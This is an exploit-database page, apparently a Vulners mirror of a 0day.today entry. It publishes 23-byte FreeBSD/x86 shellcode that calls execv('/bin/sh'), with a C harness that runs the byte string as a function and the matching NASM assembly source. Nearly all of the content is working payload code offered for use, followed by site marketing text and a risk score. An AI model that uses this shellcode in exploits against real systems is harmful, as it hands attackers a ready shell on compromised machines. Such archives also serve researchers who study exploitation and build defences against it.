Lucene search
K

FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)

🗓️ 11 Jan 2018 00:00:00Reported by ToshType 
zdt
 zdt
🔗 0day.today👁 19 Views

FreeBSD/x86 execv(/bin/sh) Shellcod

Code
/*
 -------------- FreeBSD/x86 - execv("/bin/sh") 23 bytes -------------------------
 *  AUTHOR : Tosh
 *   OS    : BSDx86 (Tested on FreeBSD 8.1)
 *   EMAIL : [email protected]
 */
 
#include <string.h>
#include <stdio.h>
 
 
 
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
                   "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
                   "\x54\x53\xb0\x3b\x50\xcd\x80";
 
int main(void)
{
   void(*f)() = (void*)shellcode;
 
   printf("Len = %d\n", sizeof(shellcode)-1);
   f();
}
 
/*!
 %define SYS_EXECV 59
 
 
section .text
 
global _start
 
_start:
   xor eax, eax
 
   push eax
 
   push '//sh'
   push '/bin'
 
   mov ebx, esp
 
   push eax
   push esp
   push ebx
   mov al, SYS_EXECV
   push eax
   int 0x80
*/

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jan 2018 00:00Current
7.1High risk
Vulners AI Score7.1
19